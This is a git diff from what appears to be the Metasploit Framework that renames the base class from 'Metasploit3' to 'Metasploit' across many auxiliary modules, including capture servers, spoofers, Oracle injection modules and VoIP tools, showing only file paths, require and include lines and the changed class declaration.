a/modules/auxiliary/server/capture/mssql.rb +++ b/modules/auxiliary/server/capture/mssql.rb @@ -12,7 +12,7 @@ NTLM_CONST = Rex::Proto::NTLM::Constants NTLM_CRYPT = Rex::Proto::NTLM::Crypt MESSAGE = Rex::Proto::NTLM::Message -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Exploit::Remote::SMB::Server diff --git a/modules/auxiliary/server/capture/mysql.rb b/modules/auxiliary/server/capture/mysql.rb index a11ff87366..c32b6620bd 100644 --- a/modules/auxiliary/server/capture/mysql.rb +++ b/modules/auxiliary/server/capture/mysql.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/pop3.rb b/modules/auxiliary/server/capture/pop3.rb index f22877434f..f1aa95700b 100644 --- a/modules/auxiliary/server/capture/pop3.rb +++ b/modules/auxiliary/server/capture/pop3.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/postgresql.rb b/modules/auxiliary/server/capture/postgresql.rb index d9f11042d1..e5c93e695a 100644 --- a/modules/auxiliary/server/capture/postgresql.rb +++ b/modules/auxiliary/server/capture/postgresql.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/printjob_capture.rb b/modules/auxiliary/server/capture/printjob_capture.rb index 8c08bf33d4..96787619bc 100644 --- a/modules/auxiliary/server/capture/printjob_capture.rb +++ b/modules/auxiliary/server/capture/printjob_capture.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/server/capture/sip.rb b/modules/auxiliary/server/capture/sip.rb index 03dd3e2113..a0fed4e5a8 100644 --- a/modules/auxiliary/server/capture/sip.rb +++ b/modules/auxiliary/server/capture/sip.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/socket' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/smb.rb b/modules/auxiliary/server/capture/smb.rb index 1f3e23306a..8b1bcd12c4 100644 --- a/modules/auxiliary/server/capture/smb.rb +++ b/modules/auxiliary/server/capture/smb.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::SMB::Server diff --git a/modules/auxiliary/server/capture/smtp.rb b/modules/auxiliary/server/capture/smtp.rb index 12769c29cb..280713da5c 100644 --- a/modules/auxiliary/server/capture/smtp.rb +++ b/modules/auxiliary/server/capture/smtp.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/telnet.rb b/modules/auxiliary/server/capture/telnet.rb index d1cabac7e4..f772760df0 100644 --- a/modules/auxiliary/server/capture/telnet.rb +++ b/modules/auxiliary/server/capture/telnet.rb @@ -6,7 +6,7 @@ require 'msf/core' # Fake Telnet Service - Kris Katterjohn 09/28/2008 -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/vnc.rb b/modules/auxiliary/server/capture/vnc.rb index adf634969d..6a15f8e334 100644 --- a/modules/auxiliary/server/capture/vnc.rb +++ b/modules/auxiliary/server/capture/vnc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/dhclient_bash_env.rb b/modules/auxiliary/server/dhclient_bash_env.rb index 1441bd48c9..2a1f072a11 100644 --- a/modules/auxiliary/server/dhclient_bash_env.rb +++ b/modules/auxiliary/server/dhclient_bash_env.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/dhcp' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::DHCPServer diff --git a/modules/auxiliary/server/dhcp.rb b/modules/auxiliary/server/dhcp.rb index 65aad4275c..c074e28bb8 100644 --- a/modules/auxiliary/server/dhcp.rb +++ b/modules/auxiliary/server/dhcp.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/dhcp' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::DHCPServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/dns/spoofhelper.rb b/modules/auxiliary/server/dns/spoofhelper.rb index 1fda7a81a6..2fcd3ec793 100644 --- a/modules/auxiliary/server/dns/spoofhelper.rb +++ b/modules/auxiliary/server/dns/spoofhelper.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'resolv' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/fakedns.rb b/modules/auxiliary/server/fakedns.rb index 88c9c5f125..f1b0c0f9b1 100644 --- a/modules/auxiliary/server/fakedns.rb +++ b/modules/auxiliary/server/fakedns.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'resolv' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/ftp.rb b/modules/auxiliary/server/ftp.rb index c6bb913e8a..953ec114c2 100644 --- a/modules/auxiliary/server/ftp.rb +++ b/modules/auxiliary/server/ftp.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::FtpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb index 285232a1fa..3b727a10e8 100644 --- a/modules/auxiliary/server/http_ntlmrelay.rb +++ b/modules/auxiliary/server/http_ntlmrelay.rb @@ -15,7 +15,7 @@ NTLM_CONST = Rex::Proto::NTLM::Constants NTLM_CRYPT = Rex::Proto::NTLM::Crypt MESSAGE = Rex::Proto::NTLM::Message -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb index 18ef1934ae..91f45357cf 100644 --- a/modules/auxiliary/server/icmp_exfil.rb +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb index 7d8e18556b..c111beb305 100644 --- a/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb +++ b/modules/auxiliary/server/jsse_skiptls_mitm_proxy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/ms15_134_mcl_leak.rb b/modules/auxiliary/server/ms15_134_mcl_leak.rb index 1b97e2d2ea..80abfbea76 100644 --- a/modules/auxiliary/server/ms15_134_mcl_leak.rb +++ b/modules/auxiliary/server/ms15_134_mcl_leak.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'cgi' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb b/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb index b30cb8c6b8..02391e4388 100644 --- a/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb +++ b/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb index f316d4100d..3db664b270 100644 --- a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb +++ b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/pxeexploit.rb b/modules/auxiliary/server/pxeexploit.rb index a2a7815f82..0f7c80c351 100644 --- a/modules/auxiliary/server/pxeexploit.rb +++ b/modules/auxiliary/server/pxeexploit.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/tftp' require 'rex/proto/dhcp' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::TFTPServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/socks4a.rb b/modules/auxiliary/server/socks4a.rb index 1695eeb3e2..addfdf31bc 100644 --- a/modules/auxiliary/server/socks4a.rb +++ b/modules/auxiliary/server/socks4a.rb @@ -7,7 +7,7 @@ require 'thread' require 'msf/core' require 'rex/proto/proxy/socks4a' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/socks_unc.rb b/modules/auxiliary/server/socks_unc.rb index 547253c0b9..2d649cd149 100644 --- a/modules/auxiliary/server/socks_unc.rb +++ b/modules/auxiliary/server/socks_unc.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/tftp.rb b/modules/auxiliary/server/tftp.rb index 92466df2ee..9db4ec579d 100644 --- a/modules/auxiliary/server/tftp.rb +++ b/modules/auxiliary/server/tftp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/tftp' require 'tmpdir' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::TFTPServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/webkit_xslt_dropper.rb b/modules/auxiliary/server/webkit_xslt_dropper.rb index c46d0dc197..cb2e57891b 100644 --- a/modules/auxiliary/server/webkit_xslt_dropper.rb +++ b/modules/auxiliary/server/webkit_xslt_dropper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/wget_symlink_file_write.rb b/modules/auxiliary/server/wget_symlink_file_write.rb index 7c1393b655..b89d7efe72 100644 --- a/modules/auxiliary/server/wget_symlink_file_write.rb +++ b/modules/auxiliary/server/wget_symlink_file_write.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::FtpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/wpad.rb b/modules/auxiliary/server/wpad.rb index 087e30c9d5..5d7056af68 100644 --- a/modules/auxiliary/server/wpad.rb +++ b/modules/auxiliary/server/wpad.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/sniffer/psnuffle.rb b/modules/auxiliary/sniffer/psnuffle.rb index d2551d6e13..b24760d8c8 100644 --- a/modules/auxiliary/sniffer/psnuffle.rb +++ b/modules/auxiliary/sniffer/psnuffle.rb @@ -15,7 +15,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture diff --git a/modules/auxiliary/spoof/arp/arp_poisoning.rb b/modules/auxiliary/spoof/arp/arp_poisoning.rb index e60bac50ee..3673e97560 100644 --- a/modules/auxiliary/spoof/arp/arp_poisoning.rb +++ b/modules/auxiliary/spoof/arp/arp_poisoning.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Capture include Msf::Auxiliary::Report diff --git a/modules/auxiliary/spoof/cisco/cdp.rb b/modules/auxiliary/spoof/cisco/cdp.rb index b320ad39ab..45d5cb42f3 100644 --- a/modules/auxiliary/spoof/cisco/cdp.rb +++ b/modules/auxiliary/spoof/cisco/cdp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Capture def initialize diff --git a/modules/auxiliary/spoof/cisco/dtp.rb b/modules/auxiliary/spoof/cisco/dtp.rb index 99635b7b88..1ce5abe531 100644 --- a/modules/auxiliary/spoof/cisco/dtp.rb +++ b/modules/auxiliary/spoof/cisco/dtp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Capture diff --git a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb index 252269ec00..d4f009487c 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/dns' require 'resolv' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Capture diff --git a/modules/auxiliary/spoof/dns/bailiwicked_host.rb b/modules/auxiliary/spoof/dns/bailiwicked_host.rb index e6b76e176e..eb68b74212 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_host.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_host.rb @@ -9,7 +9,7 @@ require 'net/dns' require 'resolv' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Capture diff --git a/modules/auxiliary/spoof/dns/compare_results.rb b/modules/auxiliary/spoof/dns/compare_results.rb index 6b881e849e..36cf5b8d9d 100644 --- a/modules/auxiliary/spoof/dns/compare_results.rb +++ b/modules/auxiliary/spoof/dns/compare_results.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/dns' require 'resolv' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary def initialize(info = {}) super(update_info(info, diff --git a/modules/auxiliary/spoof/llmnr/llmnr_response.rb b/modules/auxiliary/spoof/llmnr/llmnr_response.rb index b94cb212c8..b7008b7cfe 100644 --- a/modules/auxiliary/spoof/llmnr/llmnr_response.rb +++ b/modules/auxiliary/spoof/llmnr/llmnr_response.rb @@ -8,7 +8,7 @@ require 'socket' require 'ipaddr' require 'net/dns' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Capture diff --git a/modules/auxiliary/spoof/nbns/nbns_response.rb b/modules/auxiliary/spoof/nbns/nbns_response.rb index 56be4ad3f2..159f704389 100644 --- a/modules/auxiliary/spoof/nbns/nbns_response.rb +++ b/modules/auxiliary/spoof/nbns/nbns_response.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Capture diff --git a/modules/auxiliary/spoof/replay/pcap_replay.rb b/modules/auxiliary/spoof/replay/pcap_replay.rb index c2a8526b1b..fd0e10f87b 100644 --- a/modules/auxiliary/spoof/replay/pcap_replay.rb +++ b/modules/auxiliary/spoof/replay/pcap_replay.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Capture diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb index 321e6274cf..4b1ae5661c 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb index 94a89cafaa..3932e77b88 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb index ec27e9811d..66cc92e5bb 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb index 7b91469936..3dd0cd7e06 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb index c0022ed351..a02a211749 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb index f4fb58a5de..ca6c859ea2 100644 --- a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb +++ b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb index d7d10f96fc..2fc47d231e 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb index d37f8afa39..aa17fbd596 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb index e6a178033c..f6ca08b9e7 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/droptable_trigger.rb b/modules/auxiliary/sqli/oracle/droptable_trigger.rb index e26375ae12..f9ec295f43 100644 --- a/modules/auxiliary/sqli/oracle/droptable_trigger.rb +++ b/modules/auxiliary/sqli/oracle/droptable_trigger.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::FILEFORMAT diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb index e3df57ecb9..d7a2712839 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb index 4ecfd3accb..66bfd93a4f 100644 --- a/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb +++ b/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb index 878c2b01d6..5ce774e5e0 100644 --- a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb index 0ae6f375c2..03b7cea145 100644 --- a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb +++ b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb index 93d6a71e4b..b2b4e0d8a4 100644 --- a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb index fac34e6d92..1eb86f2ede 100644 --- a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb index d97591d2da..31bcd81a14 100644 --- a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/voip/asterisk_login.rb b/modules/auxiliary/voip/asterisk_login.rb index a05995214d..eb48e9260b 100644 --- a/modules/auxiliary/voip/asterisk_login.rb +++ b/modules/auxiliary/voip/asterisk_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/voip/cisco_cucdm_call_forward.rb b/modules/auxiliary/voip/cisco_cucdm_call_forward.rb index 54bf04b7c3..018915866f 100644 --- a/modules/auxiliary/voip/cisco_cucdm_call_forward.rb +++ b/modules/auxiliary/voip/cisco_cucdm_call_forward.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb b/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb index cccf08529f..6d3cfdb80d 100644 --- a/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb +++ b/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/voip/sip_deregister.rb b/modules/auxiliary/voip/sip_deregister.rb index 1369b7b231..9c791b89ac 100644 --- a/modules/auxiliary/voip/sip_deregister.rb +++ b/modules/auxiliary/voip/sip_deregister.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/voip/sip_invite_spoof.rb b/modules/auxiliary/voip/sip_invite_spoof.rb index 5ee141c27c..bab2c0246b 100644 --- a/modules/auxiliary/voip/sip_invite_spoof.rb +++ b/modules/auxiliary/voip/sip_invite_spoof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/voip/telisca_ips_lock_control.rb b/modules/auxiliary/voip/telisca_ips_lock_control.rb index 3f40c00489..f63ed27a00 100644 --- a/modules/auxiliary/voip/telisca_ips_lock_control.rb +++ b/modules/auxiliary/voip/telisca_ips_lock_control.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb b/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb index 6421fdb954..ad1a35e20c 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary def initialize super( diff --git a/modules/auxiliary/vsploit/malware/dns/dns_query.rb b/modules/auxiliary/vsploit/malware/dns/dns_query.rb index 0a91a507cb..f9e14094ec 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_query.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_query.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary def initialize super( diff --git a/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb b/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb index 097746a5d4..7a7105138a 100644 --- a/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb +++ b/modules/auxiliary/vsploit/malware/dns/dns_zeus.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary def initialize super( diff --git a/modules/auxiliary/vsploit/pii/email_pii.rb b/modules/auxiliary/vsploit/pii/email_pii.rb index d68bbbdea6..5175781d52 100644 --- a/modules/auxiliary/vsploit/pii/email_pii.rb +++ b/modules/auxiliary/vsploit/pii/email_pii.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # # This module sends pii via an attacker smtp machine diff --git a/modules/auxiliary/vsploit/pii/web_pii.rb b/modules/auxiliary/vsploit/pii/web_pii.rb index 2046f60300..7306d30742 100644 --- a/modules/auxiliary/vsploit/pii/web_pii.rb +++ b/modules/auxiliary/vsploit/pii/web_pii.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # # This module acts as an compromised webserver distributing PII Data diff --git a/modules/encoders/cmd/echo.rb 